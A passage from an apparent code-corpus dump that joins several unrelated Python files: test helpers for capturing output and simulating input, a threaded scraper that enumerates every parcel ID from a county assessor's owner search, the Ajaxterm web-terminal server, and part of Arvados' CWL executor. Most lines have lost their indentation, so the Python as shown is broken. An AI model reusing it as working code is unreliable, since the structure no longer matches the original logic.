what_was_printed = stderr.getvalue() # Save the value
"""
with closing(StringIO()) as sio, replace_stderr(sio):
oldprint = builtins.print
try:
            # Merely replacing sys.stderr doesn't affect libraries that already
            # cached a reference to print/stderr; overriding builtins.print makes
            # sure even those end up writing to ``sio``. Well... it works.
def newprint(*args, **kwargs):
kwargs['file'] = sio
oldprint(*args, **kwargs)
builtins.print = newprint
yield sio
finally:
builtins.print = oldprint
@contextmanager
def simulate_console_inputs(*inputs):
"""
Does some magic to simulate the given inputs to any calls to the ``input``
builtin. This yields back an InputGenerator object so you can check
which input was already used and append any additional inputs you want.
Example:
with simulate_console_inputs(0, 1, 2) as generator:
assert(input() == 0)
assert(generator.last_input == 0)
generator.inputs.append(3)
assert(input() == 1)
assert(input() == 2)
assert(input() == 3)
assert(generator.last_input == 3)
:param inputs: Any inputs to simulate.
    :raises ValueError: Raised when more input is requested than was
                        provided.
"""
class InputGenerator:
def __init__(self, inputs):
self.last_input = -1
self.inputs = inputs
def generate_input(self, prompt=''):
print(prompt, end="")
self.last_input += 1
try:
return self.inputs[self.last_input]
except IndexError:
raise ValueError("Asked for more input, but no more was "
"provided from `simulate_console_inputs`.")
input_generator = InputGenerator(list(inputs))
_input = builtins.input
builtins.input = input_generator.generate_input
try:
yield input_generator
finally:
builtins.input = _input
@contextmanager
def make_temp(suffix="", prefix="tmp", dir=None):
"""
Creates a temporary file with a closed stream and deletes it when done.
:return: A contextmanager retrieving the file path.
"""
temporary = tempfile.mkstemp(suffix=suffix, prefix=prefix, dir=dir)
os.close(temporary[0])
try:
yield temporary[1]
finally:
os.remove(temporary[1])
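# Illustrative usage:
#
#     with make_temp(suffix=".py") as path:
#         with open(path, "w") as file:
#             file.write("print('hello')")
#     # the file is removed once the block exits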
@contextmanager
def prepare_file(lines,
filename,
force_linebreaks=True,
create_tempfile=True,
tempfile_kwargs={}):
"""
Can create a temporary file (if filename is None) with the lines.
Can also add a trailing newline to each line specified if needed.
:param lines: The lines from the file. (list or tuple of strings)
:param filename: The filename to be prepared.
:param force_linebreaks: Whether to append newlines at each line if needed.
:param create_tempfile: Whether to save lines in tempfile if needed.
:param tempfile_kwargs: Kwargs passed to tempfile.mkstemp().
"""
if force_linebreaks:
lines = type(lines)(line if line.endswith('\n') else line+'\n'
for line in lines)
if not create_tempfile and filename is None:
filename = "dummy_file_name"
if not isinstance(filename, str) and create_tempfile:
with make_temp(**tempfile_kwargs) as filename:
with open(filename, 'w', encoding='utf-8') as file:
file.writelines(lines)
yield lines, filename
else:
yield lines, filename
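# Illustrative usage:
#
#     with prepare_file(["line1", "line2"], filename=None) as (lines, filename):
#         ...  # ``filename`` names a tempfile containing ``lines`` (newlines added)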
@contextmanager
def change_directory(path):
old_dir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(old_dir)
@contextmanager
def open_files(*args):
"""
Handle opening and closing for multiple files at once.
:param args: Tuples with the format ``(filename, mode)``.
"""
    files = []
    try:
        for (file, mode) in args:
            files.append(open(file, mode))
        yield tuple(files)
    finally:
        for file in files:
            file.close()
|
parcel_id_extractor.py
|
# -*- coding: utf-8 -*-
import os
import threading
from queue import Queue
from string import ascii_uppercase, digits
import requests
from bs4 import BeautifulSoup
SEARCH_URL = "https://qpublic.schneidercorp.com/Application.aspx?AppID=979&LayerID=19792&PageTypeID=2&PageID=8661" \
             "&searchType=owner_name&INPUT={}"
Q = Queue()
class ParcelIdExtractor(object):
"""
Fuzzes the owner search to extract all available parcel ids
"""
def __init__(self):
self.parcel_ids = frozenset()
self.lock = threading.Lock()
def update_ids(self, ids):
"""Use a lock to prevent multiple threads from updating parcel_ids"""
        with self.lock:
            self.parcel_ids |= frozenset(ids)
def search_all_terms(self):
"""
Puts all the search terms on a queue to be processed by worker threads.
Note: all owner names are capitalized on the assessor's site, so we
only use capitalized letters
"""
# 0-9 + A-Z
        terms = list(digits) + list(ascii_uppercase)
        for t in terms:
            Q.put(t)
def search(self, search_term, begin=0):
"""
Searches by owner name, extracts the parcel ids, then recursively pages
through the results until no more ids are found for the search_term
"""
thread = threading.current_thread().getName()
url = SEARCH_URL.format(search_term, begin)
print('{} searching {}'.format(thread, url))
r = requests.get(url)
if 'No Records Found.' in r.text:
return
else:
soup = BeautifulSoup(r.text, 'html.parser')
pids = [td.a.text for td in soup.select('td.search_value')
if td.a is not None and td.a.text != 'Map It']
if len(pids) > 0:
self.update_ids(pids)
self.search(search_term, begin + len(pids))
def process_queue(self):
while not Q.empty():
term = Q.get()
self.search(term)
Q.task_done()
def main(self, file_name='parcel_ids.txt', num_worker_threads=10):
try:
# populate queue with all the search terms
self.search_all_terms()
# start worker threads to process queue
threads = []
for i in range(num_worker_threads):
t = threading.Thread(target=self.process_queue)
threads.append(t)
t.start()
# wait for all threads to complete
            for t in threads:
                t.join()
with open(file_name, 'w') as f:
print('writing {} parcel ids'.format(len(self.parcel_ids)))
for id in self.parcel_ids:
f.write(id + os.linesep)
except Exception as error:
print(error)
if __name__ == '__main__':
ParcelIdExtractor().main()
|
ajaxterm.py
|
#!/usr/bin/env python
""" Ajaxterm """
import array,cgi,fcntl,glob,mimetypes,optparse,os,pty,random,re,signal,select,sys,threading,time,termios,struct,pwd
os.chdir(os.path.normpath(os.path.dirname(__file__)))
# Optional: Add QWeb in sys path
sys.path[0:0]=glob.glob('../../python')
import qweb
class Terminal:
def __init__(self,width=80,height=24):
self.width=width
self.height=height
self.init()
self.reset()
def init(self):
self.esc_seq={
"\x00": None,
"\x05": self.esc_da,
"\x07": None,
"\x08": self.esc_0x08,
"\x09": self.esc_0x09,
"\x0a": self.esc_0x0a,
"\x0b": self.esc_0x0a,
"\x0c": self.esc_0x0a,
"\x0d": self.esc_0x0d,
"\x0e": None,
"\x0f": None,
"\x1b#8": None,
"\x1b=": None,
"\x1b>": None,
"\x1b(0": None,
"\x1b(A": None,
"\x1b(B": None,
"\x1b[c": self.esc_da,
"\x1b[0c": self.esc_da,
"\x1b]R": None,
"\x1b7": self.esc_save,
"\x1b8": self.esc_restore,
"\x1bD": None,
"\x1bE": None,
"\x1bH": None,
"\x1bM": self.esc_ri,
"\x1bN": None,
"\x1bO": None,
"\x1bZ": self.esc_da,
"\x1ba": None,
"\x1bc": self.reset,
"\x1bn": None,
"\x1bo": None,
}
for k,v in self.esc_seq.items():
if v==None:
self.esc_seq[k]=self.esc_ignore
# regex
d={
r'\[\??([0-9;]*)([@ABCDEFGHJKLMPXacdefghlmnqrstu`])' : self.csi_dispatch,
r'\]([^\x07]+)\x07' : self.esc_ignore,
}
self.esc_re=[]
for k,v in d.items():
self.esc_re.append((re.compile('\x1b'+k),v))
# define csi sequences
self.csi_seq={
'@': (self.csi_at,[1]),
'`': (self.csi_G,[1]),
'J': (self.csi_J,[0]),
'K': (self.csi_K,[0]),
}
for i in [i[4] for i in dir(self) if i.startswith('csi_') and len(i)==5]:
if not self.csi_seq.has_key(i):
self.csi_seq[i]=(getattr(self,'csi_'+i),[1])
# Init 0-256 to latin1 and html translation table
self.trl1=""
for i in range(256):
if i<32:
self.trl1+=" "
elif i<127 or i>160:
self.trl1+=chr(i)
else:
self.trl1+="?"
self.trhtml=""
for i in range(256):
if i==0x0a or (i>32 and i<127) or i>160:
self.trhtml+=chr(i)
elif i<=32:
self.trhtml+="\xa0"
else:
self.trhtml+="?"
def reset(self,s=""):
self.scr=array.array('i',[0x000700]*(self.width*self.height))
self.st=0
self.sb=self.height-1
self.cx_bak=self.cx=0
self.cy_bak=self.cy=0
self.cl=0
self.sgr=0x000700
self.buf=""
self.outbuf=""
self.last_html=""
def peek(self,y1,x1,y2,x2):
return self.scr[self.width*y1+x1:self.width*y2+x2]
def poke(self,y,x,s):
pos=self.width*y+x
self.scr[pos:pos+len(s)]=s
def zero(self,y1,x1,y2,x2):
w=self.width*(y2-y1)+x2-x1+1
z=array.array('i',[0x000700]*w)
self.scr[self.width*y1+x1:self.width*y2+x2+1]=z
def scroll_up(self,y1,y2):
self.poke(y1,0,self.peek(y1+1,0,y2,self.width))
self.zero(y2,0,y2,self.width-1)
def scroll_down(self,y1,y2):
self.poke(y1+1,0,self.peek(y1,0,y2-1,self.width))
self.zero(y1,0,y1,self.width-1)
def scroll_right(self,y,x):
self.poke(y,x+1,self.peek(y,x,y,self.width))
self.zero(y,x,y,x)
def cursor_down(self):
if self.cy>=self.st and self.cy<=self.sb:
self.cl=0
q,r=divmod(self.cy+1,self.sb+1)
if q:
self.scroll_up(self.st,self.sb)
self.cy=self.sb
else:
self.cy=r
def cursor_right(self):
q,r=divmod(self.cx+1,self.width)
if q:
self.cl=1
else:
self.cx=r
def echo(self,c):
if self.cl:
self.cursor_down()
self.cx=0
self.scr[(self.cy*self.width)+self.cx]=self.sgr|ord(c)
self.cursor_right()
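	# Screen-buffer encoding (inferred from reset()/echo()/dumphtml()): each cell of
	# self.scr packs bg<<16 | fg<<8 | ord(char); e.g. the default attribute 0x000700
	# combined with 'A' stores 0x000741, i.e. bg=0, fg=7, character 'A'.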
def esc_0x08(self,s):
self.cx=max(0,self.cx-1)
def esc_0x09(self,s):
x=self.cx+8
q,r=divmod(x,8)
self.cx=(q*8)%self.width
def esc_0x0a(self,s):
self.cursor_down()
def esc_0x0d(self,s):
self.cl=0
self.cx=0
def esc_save(self,s):
self.cx_bak=self.cx
self.cy_bak=self.cy
def esc_restore(self,s):
self.cx=self.cx_bak
self.cy=self.cy_bak
self.cl=0
def esc_da(self,s):
self.outbuf="\x1b[?6c"
def esc_ri(self,s):
self.cy=max(self.st,self.cy-1)
if self.cy==self.st:
self.scroll_down(self.st,self.sb)
def esc_ignore(self,*s):
pass
# print "term:ignore: %s"%repr(s)
def csi_dispatch(self,seq,mo):
# CSI sequences
s=mo.group(1)
c=mo.group(2)
f=self.csi_seq.get(c,None)
if f:
try:
l=[min(int(i),1024) for i in s.split(';') if len(i)<4]
except ValueError:
l=[]
if len(l)==0:
l=f[1]
f[0](l)
# else:
# print 'csi ignore',c,l
def csi_at(self,l):
for i in range(l[0]):
self.scroll_right(self.cy,self.cx)
def csi_A(self,l):
self.cy=max(self.st,self.cy-l[0])
def csi_B(self,l):
self.cy=min(self.sb,self.cy+l[0])
def csi_C(self,l):
self.cx=min(self.width-1,self.cx+l[0])
self.cl=0
def csi_D(self,l):
self.cx=max(0,self.cx-l[0])
self.cl=0
def csi_E(self,l):
self.csi_B(l)
self.cx=0
self.cl=0
def csi_F(self,l):
self.csi_A(l)
self.cx=0
self.cl=0
def csi_G(self,l):
self.cx=min(self.width,l[0])-1
def csi_H(self,l):
if len(l)<2: l=[1,1]
self.cx=min(self.width,l[1])-1
self.cy=min(self.height,l[0])-1
self.cl=0
def csi_J(self,l):
if l[0]==0:
self.zero(self.cy,self.cx,self.height-1,self.width-1)
elif l[0]==1:
self.zero(0,0,self.cy,self.cx)
elif l[0]==2:
self.zero(0,0,self.height-1,self.width-1)
def csi_K(self,l):
if l[0]==0:
self.zero(self.cy,self.cx,self.cy,self.width-1)
elif l[0]==1:
self.zero(self.cy,0,self.cy,self.cx)
elif l[0]==2:
self.zero(self.cy,0,self.cy,self.width-1)
def csi_L(self,l):
for i in range(l[0]):
if self.cy<self.sb:
self.scroll_down(self.cy,self.sb)
def csi_M(self,l):
if self.cy>=self.st and self.cy<=self.sb:
for i in range(l[0]):
self.scroll_up(self.cy,self.sb)
def csi_P(self,l):
w,cx,cy=self.width,self.cx,self.cy
end=self.peek(cy,cx,cy,w)
self.csi_K([0])
self.poke(cy,cx,end[l[0]:])
def csi_X(self,l):
self.zero(self.cy,self.cx,self.cy,self.cx+l[0])
def csi_a(self,l):
self.csi_C(l)
def csi_c(self,l):
#'\x1b[?0c' 0-8 cursor size
pass
def csi_d(self,l):
self.cy=min(self.height,l[0])-1
def csi_e(self,l):
self.csi_B(l)
def csi_f(self,l):
self.csi_H(l)
def csi_h(self,l):
if l[0]==4:
pass
# print "insert on"
def csi_l(self,l):
if l[0]==4:
pass
# print "insert off"
def csi_m(self,l):
for i in l:
if i==0 or i==39 or i==49 or i==27:
self.sgr=0x000700
elif i==1:
self.sgr=(self.sgr|0x000800)
elif i==7:
self.sgr=0x070000
elif i>=30 and i<=37:
c=i-30
self.sgr=(self.sgr&0xff08ff)|(c<<8)
elif i>=40 and i<=47:
c=i-40
self.sgr=(self.sgr&0x00ffff)|(c<<16)
# else:
# print "CSI sgr ignore",l,i
# print 'sgr: %r %x'%(l,self.sgr)
def csi_r(self,l):
if len(l)<2: l=[0,self.height]
self.st=min(self.height-1,l[0]-1)
self.sb=min(self.height-1,l[1]-1)
self.sb=max(self.st,self.sb)
def csi_s(self,l):
self.esc_save(0)
def csi_u(self,l):
self.esc_restore(0)
def escape(self):
e=self.buf
if len(e)>32:
# print "error %r"%e
self.buf=""
elif e in self.esc_seq:
self.esc_seq[e](e)
self.buf=""
else:
for r,f in self.esc_re:
mo=r.match(e)
if mo:
f(e,mo)
self.buf=""
break
# if self.buf=='': print "ESC %r\n"%e
def write(self,s):
for i in s:
if len(self.buf) or (i in self.esc_seq):
self.buf+=i
self.escape()
elif i == '\x1b':
self.buf+=i
else:
self.echo(i)
def read(self):
b=self.outbuf
self.outbuf=""
return b
def dump(self):
r=''
for i in self.scr:
r+=chr(i&255)
return r
def dumplatin1(self):
return self.dump().translate(self.trl1)
def dumphtml(self,color=1):
h=self.height
w=self.width
r=""
span=""
span_bg,span_fg=-1,-1
for i in range(h*w):
q,c=divmod(self.scr[i],256)
if color:
bg,fg=divmod(q,256)
else:
bg,fg=0,7
if i==self.cy*w+self.cx:
bg,fg=1,7
if (bg!=span_bg or fg!=span_fg or i==h*w-1):
if len(span):
r+='<span class="f%d b%d">%s</span>'%(span_fg,span_bg,cgi.escape(span.translate(self.trhtml)))
span=""
span_bg,span_fg=bg,fg
span+=chr(c)
if i%w==w-1:
span+='\n'
r='<?xml version="1.0" encoding="ISO-8859-1"?><pre class="term">%s</pre>'%r
if self.last_html==r:
return '<?xml version="1.0"?><idem></idem>'
else:
self.last_html=r
# print self
return r
def __repr__(self):
d=self.dumplatin1()
r=""
for i in range(self.height):
r+="|%s|\n"%d[self.width*i:self.width*(i+1)]
return r
class SynchronizedMethod:
def __init__(self,lock,orig):
self.lock=lock
self.orig=orig
def __call__(self,*l):
self.lock.acquire()
r=self.orig(*l)
self.lock.release()
return r
class Multiplex:
def __init__(self,cmd=None):
signal.signal(signal.SIGCHLD, signal.SIG_IGN)
self.cmd=cmd
self.proc={}
self.lock=threading.RLock()
self.thread=threading.Thread(target=self.loop)
self.alive=1
# synchronize methods
for name in ['create','fds','proc_read','proc_write','dump','die','run']:
orig=getattr(self,name)
setattr(self,name,SynchronizedMethod(self.lock,orig))
self.thread.start()
def create(self,w=80,h=25):
pid,fd=pty.fork()
if pid==0:
try:
fdl=[int(i) for i in os.listdir('/proc/self/fd')]
except OSError:
fdl=range(256)
for i in [i for i in fdl if i>2]:
try:
os.close(i)
except OSError:
pass
if self.cmd:
cmd=['/bin/sh','-c',self.cmd]
elif os.getuid()==0:
cmd=['/bin/login']
else:
sys.stdout.write("Login: ")
login=sys.stdin.readline().strip()
if re.match('^[0-9A-Za-z-_. ]+$',login):
cmd=['ssh']
cmd+=['-oPreferredAuthentications=keyboard-interactive,password']
cmd+=['-oNoHostAuthenticationForLocalhost=yes']
cmd+=['-oLogLevel=FATAL']
cmd+=['-F/dev/null','-l',login,'localhost']
else:
os._exit(0)
env={}
env["COLUMNS"]=str(w)
env["LINES"]=str(h)
env["TERM"]="linux"
env["PATH"]=os.environ['PATH']
os.execvpe(cmd[0],cmd,env)
else:
fcntl.fcntl(fd, fcntl.F_SETFL, os.O_NONBLOCK)
# python bug http://python.org/sf/1112949 on amd64
fcntl.ioctl(fd, struct.unpack('i',struct.pack('I',termios.TIOCSWINSZ))[0], struct.pack("HHHH",h,w,0,0))
self.proc[fd]={'pid':pid,'term':Terminal(w,h),'buf':'','time':time.time()}
return fd
def die(self):
self.alive=0
def run(self):
return self.alive
def fds(self):
return self.proc.keys()
def proc_kill(self,fd):
if fd in self.proc:
self.proc[fd]['time']=0
t=time.time()
for i in self.proc.keys():
t0=self.proc[i]['time']
if (t-t0)>120:
try:
os.close(i)
os.kill(self.proc[i]['pid'],signal.SIGTERM)
except (IOError,OSError):
pass
del self.proc[i]
def proc_read(self,fd):
try:
t=self.proc[fd]['term']
t.write(os.read(fd,65536))
reply=t.read()
if reply:
os.write(fd,reply)
self.proc[fd]['time']=time.time()
except (KeyError,IOError,OSError):
self.proc_kill(fd)
def proc_write(self,fd,s):
try:
os.write(fd,s)
except (IOError,OSError):
self.proc_kill(fd)
def dump(self,fd,color=1):
try:
return self.proc[fd]['term'].dumphtml(color)
except KeyError:
return False
def loop(self):
while self.run():
fds=self.fds()
i,o,e=select.select(fds, [], [], 1.0)
for fd in i:
self.proc_read(fd)
if len(i):
time.sleep(0.002)
for i in self.proc.keys():
try:
os.close(i)
os.kill(self.proc[i]['pid'],signal.SIGTERM)
except (IOError,OSError):
pass
class AjaxTerm:
def __init__(self,cmd=None,index_file='ajaxterm.html'):
self.files={}
for i in ['css','html','js']:
for j in glob.glob('*.%s'%i):
self.files[j]=file(j).read()
self.files['index']=file(index_file).read()
self.mime = mimetypes.types_map.copy()
self.mime['.html']= 'text/html; charset=UTF-8'
self.multi = Multiplex(cmd)
self.session = {}
def __call__(self, environ, start_response):
req = qweb.QWebRequest(environ, start_response,session=None)
if req.PATH_INFO.endswith('/u'):
s=req.REQUEST["s"]
k=req.REQUEST["k"]
c=req.REQUEST["c"]
w=req.REQUEST.int("w")
h=req.REQUEST.int("h")
if s in self.session:
term=self.session[s]
else:
if not (w>2 and w<256 and h>2 and h<100):
w,h=80,25
term=self.session[s]=self.multi.create(w,h)
if k:
self.multi.proc_write(term,k)
time.sleep(0.002)
dump=self.multi.dump(term,c)
req.response_headers['Content-Type']='text/xml'
if isinstance(dump,str):
req.write(dump)
req.response_gzencode=1
else:
del self.session[s]
req.write('<?xml version="1.0"?><idem></idem>')
# print "sessions %r"%self.session
else:
n=os.path.basename(req.PATH_INFO)
if n in self.files:
req.response_headers['Content-Type'] = self.mime.get(os.path.splitext(n)[1].lower(), 'application/octet-stream')
req.write(self.files[n])
else:
req.response_headers['Content-Type'] = 'text/html; charset=UTF-8'
req.write(self.files['index'])
return req
def main():
parser = optparse.OptionParser()
parser.add_option("-p", "--port", dest="port", default="8022", help="Set the TCP port (default: 8022)")
parser.add_option("-c", "--command", dest="cmd", default=None,help="set the command (default: /bin/login or ssh localhost)")
parser.add_option("-l", "--log", action="store_true", dest="log",default=0,help="log requests to stderr (default: quiet mode)")
parser.add_option("-d", "--daemon", action="store_true", dest="daemon", default=0, help="run as daemon in the background")
parser.add_option("-P", "--pidfile",dest="pidfile",default="/var/run/ajaxterm.pid",help="set the pidfile (default: /var/run/ajaxterm.pid)")
parser.add_option("-i", "--index", dest="index_file", default="ajaxterm.html",help="default index file (default: ajaxterm.html)")
parser.add_option("-u", "--uid", dest="uid", help="Set the daemon's user id")
(o, a) = parser.parse_args()
if o.daemon:
pid=os.fork()
if pid == 0:
#os.setsid() ?
os.setpgrp()
nullin = file('/dev/null', 'r')
nullout = file('/dev/null', 'w')
os.dup2(nullin.fileno(), sys.stdin.fileno())
os.dup2(nullout.fileno(), sys.stdout.fileno())
os.dup2(nullout.fileno(), sys.stderr.fileno())
if os.getuid()==0 and o.uid:
try:
os.setuid(int(o.uid))
except:
os.setuid(pwd.getpwnam(o.uid).pw_uid)
else:
try:
file(o.pidfile,'w+').write(str(pid)+'\n')
except:
pass
print 'AjaxTerm at http://localhost:%s/ pid: %d' % (o.port,pid)
sys.exit(0)
else:
print 'AjaxTerm at http://localhost:%s/' % o.port
at=AjaxTerm(o.cmd,o.index_file)
# f=lambda:os.system('firefox http://localhost:%s/&'%o.port)
# qweb.qweb_wsgi_autorun(at,ip='localhost',port=int(o.port),threaded=0,log=o.log,callback_ready=None)
try:
qweb.QWebWSGIServer(at,ip='localhost',port=int(o.port),threaded=0,log=o.log).serve_forever()
except KeyboardInterrupt,e:
sys.excepthook(*sys.exc_info())
at.multi.die()
if __name__ == '__main__':
main()
|
executor.py
|
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
from __future__ import division
from builtins import next
from builtins import object
from builtins import str
from future.utils import viewvalues, viewitems
import argparse
import logging
import os
import sys
import threading
import copy
import json
import re
from functools import partial
import time
import urllib
from cwltool.errors import WorkflowException
import cwltool.workflow
from schema_salad.sourceline import SourceLine
import schema_salad.validate as validate
import arvados
import arvados.config
from arvados.keep import KeepClient
from arvados.errors import ApiError
import arvados_cwl.util
from .arvcontainer import RunnerContainer
from .runner import Runner, upload_docker, upload_job_order, upload_workflow_deps, make_builder
from .arvtool import ArvadosCommandTool, validate_cluster_target, ArvadosExpressionTool
from .arvworkflow import ArvadosWorkflow, upload_workflow
from .fsaccess import CollectionFsAccess, CollectionFetcher, collectionResolver, CollectionCache, pdh_size
from .perf import Perf
from .pathmapper import NoFollowPathMapper
from cwltool.task_queue import TaskQueue
from .context import ArvLoadingContext, ArvRuntimeContext
from ._version import __version__
from cwltool.process import shortname, UnsupportedRequirement, use_custom_schema
from cwltool.utils import adjustFileObjs, adjustDirObjs, get_listing, visit_class, aslist
from cwltool.command_line_tool import compute_checksums
from cwltool.load_tool import load_tool
logger = logging.getLogger('arvados.cwl-runner')
metrics = logging.getLogger('arvados.cwl-runner.metrics')
DEFAULT_PRIORITY = 500
class RuntimeStatusLoggingHandler(logging.Handler):
"""
Intercepts logging calls and report them as runtime statuses on runner
containers.
"""
def __init__(self, runtime_status_update_func):
super(RuntimeStatusLoggingHandler, self).__init__()
self.runtime_status_update = runtime_status_update_func
self.updatingRuntimeStatus = False
def emit(self, record):
kind = None
if record.levelno >= logging.ERROR:
kind = 'error'
elif record.levelno >= logging.WARNING:
kind = 'warning'
if kind is not None and self.updatingRuntimeStatus is not True:
self.updatingRuntimeStatus = True
try:
log_msg = record.getMessage()
if '\n' in log_msg:
# If the logged message is multi-line, use its first line as status
# and the rest as detail.
status, detail = log_msg.split('\n', 1)
self.runtime_status_update(
kind,
"%s: %s" % (record.name, status),
detail
)
else:
self.runtime_status_update(
kind,
"%s: %s" % (record.name, record.getMessage())
)
finally:
self.updatingRuntimeStatus = False
class ArvCwlExecutor(object):
"""Execute a CWL tool or workflow, submit work (using containers API),
wait for them to complete, and report output.
"""
def __init__(self, api_client,
arvargs=None,
keep_client=None,
num_retries=4,
thread_count=4,
stdout=sys.stdout):
if arvargs is None:
arvargs = argparse.Namespace()
arvargs.work_api = None
arvargs.output_name = None
arvargs.output_tags = None
arvargs.thread_count = 1
arvargs.collection_cache_size = None
self.api = api_client
self.processes = {}
self.workflow_eval_lock = threading.Condition(threading.RLock())
self.final_output = None
self.final_status = None
self.num_retries = num_retries
self.uuid = None
self.stop_polling = threading.Event()
self.poll_api = None
self.pipeline = None
self.final_output_collection = None
self.output_name = arvargs.output_name
self.output_tags = arvargs.output_tags
self.project_uuid = None
self.intermediate_output_ttl = 0
self.intermediate_output_collections = []
self.trash_intermediate = False
self.thread_count = arvargs.thread_count
self.poll_interval = 12
self.loadingContext = None
self.should_estimate_cache_size = True
self.fs_access = None
self.secret_store = None
self.stdout = stdout
if keep_client is not None:
self.keep_client = keep_client
else:
self.keep_client = arvados.keep.KeepClient(api_client=self.api, num_retries=self.num_retries)
if arvargs.collection_cache_size:
collection_cache_size = arvargs.collection_cache_size*1024*1024
self.should_estimate_cache_size = False
else:
collection_cache_size = 256*1024*1024
self.collection_cache = CollectionCache(self.api, self.keep_client, self.num_retries,
cap=collection_cache_size)
self.fetcher_constructor = partial(CollectionFetcher,
api_client=self.api,
fs_access=CollectionFsAccess("", collection_cache=self.collection_cache),
num_retries=self.num_retries)
self.work_api = None
expected_api = ["containers"]
for api in expected_api:
try:
methods = self.api._rootDesc.get('resources')[api]['methods']
if ('httpMethod' in methods['create'] and
(arvargs.work_api == api or arvargs.work_api is None)):
self.work_api = api
break
except KeyError:
pass
if not self.work_api:
if arvargs.work_api is None:
raise Exception("No supported APIs")
else:
raise Exception("Unsupported API '%s', expected one of %s" % (arvargs.work_api, expected_api))
if self.work_api == "jobs":
logger.error("""
*******************************
The 'jobs' API is no longer supported.
*******************************""")
exit(1)
self.loadingContext = ArvLoadingContext(vars(arvargs))
self.loadingContext.fetcher_constructor = self.fetcher_constructor
self.loadingContext.resolver = partial(collectionResolver, self.api, num_retries=self.num_retries)
self.loadingContext.construct_tool_object = self.arv_make_tool
# Add a custom logging handler to the root logger for runtime status reporting
# if running inside a container
if arvados_cwl.util.get_current_container(self.api, self.num_retries, logger):
root_logger = logging.getLogger('')
# Remove existing RuntimeStatusLoggingHandlers if they exist
handlers = [h for h in root_logger.handlers if not isinstance(h, RuntimeStatusLoggingHandler)]
root_logger.handlers = handlers
handler = RuntimeStatusLoggingHandler(self.runtime_status_update)
root_logger.addHandler(handler)
self.toplevel_runtimeContext = ArvRuntimeContext(vars(arvargs))
self.toplevel_runtimeContext.make_fs_access = partial(CollectionFsAccess,
collection_cache=self.collection_cache)
validate_cluster_target(self, self.toplevel_runtimeContext)
def arv_make_tool(self, toolpath_object, loadingContext):
if "class" in toolpath_object and toolpath_object["class"] == "CommandLineTool":
return ArvadosCommandTool(self, toolpath_object, loadingContext)
elif "class" in toolpath_object and toolpath_object["class"] == "Workflow":
return ArvadosWorkflow(self, toolpath_object, loadingContext)
elif "class" in toolpath_object and toolpath_object["class"] == "ExpressionTool":
return ArvadosExpressionTool(self, toolpath_object, loadingContext)
else:
raise Exception("Unknown tool %s" % toolpath_object.get("class"))
def output_callback(self, out, processStatus):
with self.workflow_eval_lock:
if processStatus == "success":
logger.info("Overall process status is %s", processStatus)
state = "Complete"
else:
logger.error("Overall process status is %s", processStatus)
state = "Failed"
if self.pipeline:
self.api.pipeline_instances().update(uuid=self.pipeline["uuid"],
body={"state": state}).execute(num_retries=self.num_retries)
self.final_status = processStatus
self.final_output = out
self.workflow_eval_lock.notifyAll()
def start_run(self, runnable, runtimeContext):
self.task_queue.add(partial(runnable.run, runtimeContext),
self.workflow_eval_lock, self.stop_polling)
def process_submitted(self, container):
with self.workflow_eval_lock:
self.processes[container.uuid] = container
def process_done(self, uuid, record):
with self.workflow_eval_lock:
j = self.processes[uuid]
logger.info("%s %s is %s", self.label(j), uuid, record["state"])
self.task_queue.add(partial(j.done, record),
self.workflow_eval_lock, self.stop_polling)
del self.processes[uuid]
def runtime_status_update(self, kind, message, detail=None):
"""
Updates the runtime_status field on the runner container.
Called when there's a need to report errors, warnings or just
activity statuses, for example in the RuntimeStatusLoggingHandler.
"""
with self.workflow_eval_lock:
current = None
try:
current = arvados_cwl.util.get_current_container(self.api, self.num_retries, logger)
except Exception as e:
logger.info("Couldn't get current container: %s", e)
if current is None:
return
runtime_status = current.get('runtime_status', {})
if kind in ('error', 'warning'):
updatemessage = runtime_status.get(kind, "")
if not updatemessage:
updatemessage = message
# Subsequent messages tacked on in detail
updatedetail = runtime_status.get(kind+'Detail', "")
maxlines = 40
if updatedetail.count("\n") < maxlines:
if updatedetail:
updatedetail += "\n"
updatedetail += message + "\n"
if detail:
updatedetail += detail + "\n"
if updatedetail.count("\n") >= maxlines:
updatedetail += "\nSome messages may have been omitted. Check the full log."
runtime_status.update({
kind: updatemessage,
kind+'Detail': updatedetail,
})
else:
# Ignore any other status kind
return
try:
self.api.containers().update(uuid=current['uuid'],
body={
'runtime_status': runtime_status,
}).execute(num_retries=self.num_retries)
except Exception as e:
logger.info("Couldn't update runtime_status: %s", e)
def wrapped_callback(self, cb, obj, st):
with self.workflow_eval_lock:
cb(obj, st)
self.workflow_eval_lock.notifyAll()
def get_wrapped_callback(self, cb):
return partial(self.wrapped_callback, cb)
def on_message(self, event):
if event.get("object_uuid") in self.processes and event["event_type"] == "update":
uuid = event["object_uuid"]
if event["properties"]["new_attributes"]["state"] == "Running":
with self.workflow_eval_lock:
j = self.processes[uuid]
if j.running is False:
j.running = True
j.update_pipeline_component(event["properties"]["new_attributes"])
logger.info("%s %s is Running", self.label(j), uuid)
elif event["properties"]["new_attributes"]["state"] in ("Complete", "Failed", "Cancelled", "Final"):
self.process_done(uuid, event["properties"]["new_attributes"])
def label(self, obj):
return "[%s %s]" % (self.work_api[0:-1], obj.name)
def poll_states(self):
"""Poll status of containers listed in the processes dict.
Runs in a separate thread.
"""
try:
remain_wait = self.poll_interval
while True:
if remain_wait > 0:
self.stop_polling.wait(remain_wait)
if self.stop_polling.is_set():
break
with self.workflow_eval_lock:
keys = list(self.processes)
if not keys:
remain_wait = self.poll_interval
continue
begin_poll = time.time()
if self.work_api == "containers":
table = self.poll_api.container_requests()
pageSize = self.poll_api._rootDesc.get('maxItemsPerResponse', 1000)
while keys:
page = keys[:pageSize]
try:
proc_states = table.list(filters=[["uuid", "in", page]]).execute(num_retries=self.num_retries)
except Exception:
logger.exception("Error checking states on API server: %s")
remain_wait = self.poll_interval
continue
for p in proc_states["items"]:
self.on_message({
"object_uuid": p["uuid"],
"event_type": "update",
"properties": {
"new_attributes": p
}
})
keys = keys[pageSize:]
finish_poll = time.time()
remain_wait = self.poll_interval - (finish_poll - begin_poll)
except:
logger.exception("Fatal error in state polling thread.")
with self.workflow_eval_lock:
self.processes.clear()
self.workflow_eval_lock.notifyAll()
finally:
self.stop_polling.set()
def add_intermediate_output(self, uuid):
if uuid:
self.intermediate_output_collections.append(uuid)
def trash_intermediate_output(self):
logger.info("Cleaning up intermediate output collections")
for i in self.intermediate_output_collections:
try:
self.api.collections().delete(uuid=i).execute(num_retries=self.num_retries)
except Exception:
